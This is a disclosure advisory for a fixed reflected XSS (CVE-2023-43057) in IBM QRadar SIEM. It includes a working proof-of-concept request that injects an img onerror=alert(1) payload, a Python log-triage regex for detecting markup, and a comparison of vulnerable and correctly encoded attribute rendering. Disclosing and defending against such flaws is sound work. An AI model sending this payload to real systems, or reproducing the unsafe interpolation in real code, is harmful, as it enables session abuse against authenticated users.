usd-2023-0032 | Reflected XSS in IBM QRadar SIEM 7.5.0 UpdatePackage 5

Advisory ID: usd-2023-0032
Product: IBM QRadar SIEM
Affected Version: IBM QRadar SIEM 7.5.0 UpdatePackage 5 (Build 20230301133107)
Vulnerability Type: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Security Risk: Medium
Vendor URL: https://www.usd.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE number: CVE-2023-43057
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-43057

Description

IBM QRadar SIEM is a security information and event management platform developed by IBM that provides advanced threat detection for its users.

The web interface of the platform is vulnerable to a reflected cross-site scripting attack.
The GET parameter selectorType is not properly encoded by the application, allowing attackers to inject arbitrary JavaScript code into the resulting web page.

Attackers could generate links containing malicious JavaScript code and send them to users who are authenticated to the application.
When the link is opened, the malicious JavaScript code is executed in the user's browser.
This vulnerability could be exploited by attackers in a number of ways. For example, they could perform arbitrary actions within the application in the user's name, or redirect the user to other locations.

Proof of Concept

In the following, the HTML tag "><img onerror="alert(1)" src="a"/> has been inserted into the HTTP GET selectorType parameter and sent to the application.

GET /console/do/qradar/arielProperties?id=&hasLinkedExpression=false&database=events&submitTestPayload=&destPayload=&sourcePayload=&selectorType=regex%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e&dispatch=save&prevAction=&newProperty=true&newPropertyName=&__checkbox_forceparse=true&propertyDescription=&enabled=true&__checkbox_enabled=true&deviceTypeId=4009&deviceid=-1&parsedOn=false&qid=1004000002&expressionTypeValue=REGEX&regex=SAP&captureGroup=1&delimiter=&delimiterPair=&aqlExpression=&property1=&property1UD=&operator=%2B&property2=&property2UD=&languagetag=en-US&dateTimePattern=&patternSelect=M&languagetag=en-US HTTP/1.1
Host: [...]
Cookie: JSESSIONID=[...]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Connection: close

The application will then return the following response:

HTTP/1.1 200
Server: QRadar
[...]

<?xml version="1.0" encoding="UTF-8">
[...]
        </div>
        <input type="hidden" name="id" value="" id="qradar_arielProperties_id"/>
        <input type="hidden" name="hasLinkedExpression" value="false" id="qradar_arielProperties_hasLinkedExpression"/>
        <input type="hidden" name="database" value="events" id="qradar_arielProperties_database"/>
        <input type="hidden" name="submitTestPayload" value="" id="testPayload"/>
        <input type="hidden" name="destPayload" value="" id="destPayload"/>
        <input type="hidden" name="sourcePayload" value="" id="sourcePayload"/>
        <input type="hidden" name="selectorType" id="calculated" value="regex\"><img src=a onerror=alert(1)>"/>
        <input type="hidden" name="dispatch" value="save" />
        <input type="hidden" name="prevAction" value="" />
[...]

Line 15 of the response shows that the HTML tag is inserted into the web page and the JavaScript alert(1) is executed.
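As an added illustration from the detection side (not part of the original advisory and not IBM or usd AG code), the following script decodes the query string of logged requests to the endpoint above and flags parameter values that contain tag delimiters, quotes or an inline event handler. The log lines are constructed samples: the first carries the percent-encoded selectorType payload from the proof of concept, the second is a benign request to the same endpoint. Matching only after percent-decoding matters, because the raw request line contains no literal `<` or `>`.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the advisory): the first
# carries the percent-encoded selectorType payload from the proof of concept,
# the second is a benign request to the same endpoint.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Sep/2023:10:00:00 +0000] "GET /console/do/qradar/arielProperties'
    '?database=events&selectorType=regex%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e'
    '&dispatch=save HTTP/1.1" 200 5120',
    '10.0.0.6 - - [28/Sep/2023:10:00:01 +0000] "GET /console/do/qradar/arielProperties'
    '?database=events&selectorType=regex&dispatch=save HTTP/1.1" 200 5120',
]

# Request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Characters and patterns that have no business in a plain selector name:
# tag delimiters, quotes, or an inline event handler such as onerror=.
MARKUP_RE = re.compile(r'[<>"\']|\bon[a-z]+\s*=', re.IGNORECASE)


def decoded_query(log_line: str) -> dict:
    """Return the percent-decoded query parameters of the logged request."""
    m = REQUEST_RE.search(log_line)
    if m is None:
        return {}
    # parse_qs percent-decodes values, so the match runs on what the server saw.
    return parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)


def suspicious_params(log_line: str) -> dict:
    """Map parameter name -> decoded value for every value containing markup."""
    hits = {}
    for name, values in decoded_query(log_line).items():
        for value in values:
            if MARKUP_RE.search(value):
                hits[name] = value
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```

The pattern is deliberately broad and will also flag legitimate values that happen to contain a quote, so in practice it is a triage aid scoped to the parameters the advisory names rather than a stand-alone alert rule; it also only sees what the web server logs, so POST bodies are out of scope.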

Fix

It is recommended that any user input that is written back into a web page be encoded according to the output context (here, an HTML attribute value).
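To make the recommendation concrete, here is an added example (not QRadar code and not part of the advisory) of a hypothetical server-side routine that writes the selectorType hidden input shown in the response above. Three variants are rendered with the payload from the proof of concept: verbatim interpolation, backslash-escaping of quotes (the shape visible in the advisory's response, where a string-literal convention has been applied to an HTML attribute), and entity encoding with `html.escape`. Python's own `html.parser` then plays the role of the browser and reports which elements it actually sees.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the selectorType value from the advisory's request,
# after URL decoding.
SELECTOR_TYPE_PAYLOAD = 'regex"><img src=a onerror=alert(1)>'

# Hypothetical stand-ins for the template that writes the hidden input.
TEMPLATE = '<input type="hidden" name="selectorType" id="calculated" value="{}"/>'


def render_hidden_input_unsafe(value: str) -> str:
    # Vulnerable: the value is interpolated verbatim, so a quote closes the
    # attribute and a > closes the tag.
    return TEMPLATE.format(value)


def render_hidden_input_backslash(value: str) -> str:
    # Still vulnerable: \" is an escape sequence in string literals, not in
    # HTML. The parser ends the attribute at the first quote regardless.
    escaped = value.replace('"', '\\"')
    return TEMPLATE.format(escaped)


def render_hidden_input_safe(value: str) -> str:
    # Correct for the HTML attribute context: &, <, >, " and ' become entities,
    # so the value can never leave the attribute.
    return TEMPLATE.format(html.escape(value, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag and the value attribute of the selectorType input."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.selector_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attributes = dict(attrs)
        if tag == "input" and attributes.get("name") == "selectorType":
            self.selector_value = attributes.get("value")


def parse(fragment: str) -> TagCollector:
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector


def injected_tags(fragment: str) -> list:
    """Element names other than the intended <input> that a parser sees."""
    return [t for t in parse(fragment).tags if t != "input"]


def recovered_value(fragment: str):
    """The selectorType value as the parser reads it back (entities decoded)."""
    return parse(fragment).selector_value


if __name__ == "__main__":
    for render in (render_hidden_input_unsafe,
                   render_hidden_input_backslash,
                   render_hidden_input_safe):
        out = render(SELECTOR_TYPE_PAYLOAD)
        print(render.__name__, "->", injected_tags(out), repr(recovered_value(out)))
```

The safe variant is the only one for which the parser reports no extra element, and it also round-trips the original string unchanged, which is the property to check when the value is later read back by the form handler. The same value placed in a different context (a JavaScript string, a URL, a CSS value) needs that context's encoder, not this one.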

References

https://owasp.org/www-community/attacks/xss/
https://nvd.nist.gov/vuln/detail/CVE-2023-43057
https://www.ibm.com/support/pages/node/7070736

Timeline

  • 2023-09-28: First contact request via hackerone.com.
  • 2023-11-16: IBM notifies us of a fix for the reported vulnerability, now referred to as CVE-2023-43057.
  • 2023-11-20: Security Advisory published by usd AG.

Credits

This security vulnerability was identified by Gerbert Roitburd and Dominik Baucke of usd AG.